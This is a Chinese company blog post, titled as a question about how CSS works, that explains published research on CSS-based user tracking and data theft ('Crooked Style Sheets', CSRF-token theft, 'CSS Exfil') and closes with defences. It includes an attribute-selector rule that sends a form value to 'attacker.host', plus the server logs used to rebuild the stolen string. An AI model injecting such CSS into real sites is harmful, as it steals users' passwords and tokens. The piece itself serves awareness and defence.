這篇文章主要介紹“CSS工作原理是什么”,在日常操作中,相信很多人在CSS工作原理是什么問(wèn)題上存在疑惑,小編查閱了各式資料,整理出簡(jiǎn)單好用的操作方法,希望對(duì)大家解答”CSS工作原理是什么”的疑惑有所幫助!接下來(lái),請(qǐng)跟著小編一起來(lái)學(xué)習(xí)吧!
成都創(chuàng)新互聯(lián)從2013年成立,先為印江等服務(wù)建站,印江等地企業(yè),進(jìn)行企業(yè)商務(wù)咨詢(xún)服務(wù)。為印江企業(yè)網(wǎng)站制作PC+手機(jī)+微官網(wǎng)三網(wǎng)同步一站式服務(wù)解決您的所有建站問(wèn)題。
CSS不僅在網(wǎng)頁(yè)展現(xiàn)時(shí)強(qiáng)大,在追蹤用戶(hù)時(shí)也能發(fā)揮作用。它能夠追蹤網(wǎng)站用戶(hù),從網(wǎng)頁(yè)中提取和竊取數(shù)據(jù),收集表單域中輸入的數(shù)據(jù)(包括密碼),甚至讓暗網(wǎng)用戶(hù)暴露身份。
在過(guò)去的一個(gè)月里,三個(gè)有趣的研究項(xiàng)目都把CSS作為攻擊媒介,顯示了這種看似無(wú)害的語(yǔ)言也能被用來(lái)針對(duì)用戶(hù)。
關(guān)于這個(gè)主題的第一個(gè)項(xiàng)目是JanB?hmer的一個(gè)項(xiàng)目“Crooked Style Sheets”,這個(gè)項(xiàng)目提供了一個(gè)無(wú)JavaScript的跟蹤方案,可以通過(guò)CSS代碼的頁(yè)面交互跟蹤用戶(hù)。
B?hmer表示,他可以跟蹤用戶(hù)何時(shí)懸停鼠標(biāo),何時(shí)點(diǎn)擊鏈接,何時(shí)在輸入字段中輸入文本,以及收集大量真實(shí)的用戶(hù)代理信息,即便用戶(hù)使用假的UA也沒(méi)有用。
與B?hmer的工作不同,安全研究人員Dylan Ayrey(XSSJacking作者)也在上周末發(fā)布了新的研究成果,展示攻擊者如何濫用CSS來(lái)竊取CSRF(用戶(hù)身份驗(yàn)證)token。
Ayrey的攻擊只適用于在各種HTML頁(yè)面元素的屬性中存儲(chǔ)CSRF令牌的嚴(yán)重錯(cuò)誤的網(wǎng)站和應(yīng)用程序,因此其范圍非常有限。這種攻擊可能很容易被網(wǎng)站/應(yīng)用程序所有者擊敗,他們發(fā)現(xiàn)一種更安全的方式來(lái)驗(yàn)證用戶(hù),而不會(huì)在網(wǎng)頁(yè)的源代碼中傾銷(xiāo)CSRF令牌。
Ayrey的技術(shù)依賴(lài)于在網(wǎng)頁(yè)中注入CSS代碼,使用CSS屬性選擇器每次猜解CSRF token的一個(gè)字母。
攻擊需要10秒鐘左右完成,甚至可以在不需要iframe的情況下工作,不需要持續(xù)流量的遠(yuǎn)程服務(wù)器也就沒(méi)有機(jī)會(huì)提醒出現(xiàn)問(wèn)題的用戶(hù)。
Ayrey的研究只是停留在表面。過(guò)去的一個(gè)月中,安全研究員Mike Gualtieri也一直在努力使用相同的技術(shù),但不僅僅是竊取token。
Gualtieri研究的是如何使用CSS屬性選擇器來(lái)猜測(cè)留在HTML標(biāo)簽內(nèi)的敏感內(nèi)容。
研究人員能夠利用這種方法收集在表單域中輸入的敏感用戶(hù)數(shù)據(jù),包括密碼字符串。
Ayrey和Gualtieri的方法都利用了CSS屬性選擇器,屬性選擇器能讓開(kāi)發(fā)人員查詢(xún)單個(gè)屬性的頁(yè)面HTML標(biāo)記,并且匹配它們的值。
舉個(gè)例子,下面的CSS代碼將搜索頁(yè)面中的“href”屬性包含“facebook”字符串的鏈接元素(“a”),并將所有這些鏈接加上藍(lán)色。
a[href*="facebook"] {
color: blue;
}
這些查詢(xún)看似無(wú)害,但在研究人員看來(lái)可能被用來(lái)實(shí)施攻擊。
這些查詢(xún)可以拼接在一起,執(zhí)行基本的字典暴力攻擊,并嘗試猜測(cè)屬性的起始字母,然后將識(shí)別的字母添加到新的模式匹配語(yǔ)法中,從而攻擊者可以猜解第二個(gè),第三個(gè)等字母。
[attribute=value] [foo=bar] 選擇foo =“bar”的所有元素
[attribute~=value] [foo~=bar] 選擇所有包含單詞“bar”的foo屬性的元素
[attribute|=value] [foo|=bar] 選擇所有具有以“bar”開(kāi)頭的foo屬性值的元素
[attribute^=value] [foo^="bar"] 選擇所有具有以“bar”開(kāi)頭的foo屬性值的元素
[attribute$=value] [foo$="bar"] 選擇所有具有以“bar”結(jié)尾的foo屬性值的元素
[attribute*=value] [foo*="bar"] 選擇所有包含子字符串“bar”的foo屬性的元素
攻擊者需要構(gòu)造惡意HTTP請(qǐng)求,執(zhí)行CSS代碼選擇器。
#username[value="ZeroC00L"] {
background:url("https://attacker.host/ZeroC00L");
}
攻擊者只需要通過(guò)對(duì)服務(wù)器404的錯(cuò)誤篩選,找出想要的結(jié)果。
127.0.0.1 - - [30/Jan/2018:11:09:35 -0500] "GET /00 HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:35 -0500] "GET /0L HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /Ze HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /Z_ HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /ro HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /oC HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /_L HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /er HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /C0 HTTP/1.1" 404 22
之后再把字符串組合成完整的數(shù)據(jù)
Z # Z_
Ze # Ze
Zer # er
Zero # ro
ZeroC # oC
ZeroC0 # C0
ZeroC00 # 00
ZeroC00L # 0L _L
Ayrey和Gualtieri用了兩種不同的方法進(jìn)行攻擊。 Ayrey一次猜測(cè)最后一個(gè)字母,而Gualtieri則通過(guò)多個(gè)猜測(cè)來(lái)重建字符串,最后將他們組合。
兩種方法都有效。Ayrey的方法噪音較大,但可以很容易自動(dòng)化,而Gualtieri的方法更快(也可以自動(dòng)化),但在某些情況下會(huì)依賴(lài)于人來(lái)拼接字符串。
Gualtieri將此技術(shù)命名為CSS Exfil。但CSS Exfil只能在加載時(shí)竊取頁(yè)面上的HTML屬性,不能在初始頁(yè)面加載后從動(dòng)態(tài)注入的代碼中竊取。 Gualtieri認(rèn)為這不是大問(wèn)題,他的研究提到攻擊者可以有各種解決方法。
防范CSS Exfil攻擊可以分為兩個(gè)層面。首先,網(wǎng)站和網(wǎng)絡(luò)應(yīng)用程序作者可以實(shí)施內(nèi)容安全策略(CSP),防止攻擊者從外部加載CSS代碼。
其次,訪客還可以安裝Gualtieri的Firefox或Chrome擴(kuò)展程序,它可以檢測(cè)Gualtieri在他的研究中記錄的所有類(lèi)型的CSS Exfil攻擊,并在執(zhí)行之前重寫(xiě)惡意代碼。
你可以訪問(wèn)這里的網(wǎng)頁(yè)進(jìn)行測(cè)試。
到此,關(guān)于“CSS工作原理是什么”的學(xué)習(xí)就結(jié)束了,希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí),快去試試吧!若想繼續(xù)學(xué)習(xí)更多相關(guān)知識(shí),請(qǐng)繼續(xù)關(guān)注創(chuàng)新互聯(lián)網(wǎng)站,小編會(huì)繼續(xù)努力為大家?guī)?lái)更多實(shí)用的文章!
文章題目:CSS工作原理是什么
標(biāo)題URL:http://jinyejixie.com/article4/pspiie.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供全網(wǎng)營(yíng)銷(xiāo)推廣、商城網(wǎng)站、響應(yīng)式網(wǎng)站、網(wǎng)站營(yíng)銷(xiāo)、網(wǎng)站收錄、網(wǎng)站改版
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話(huà):028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)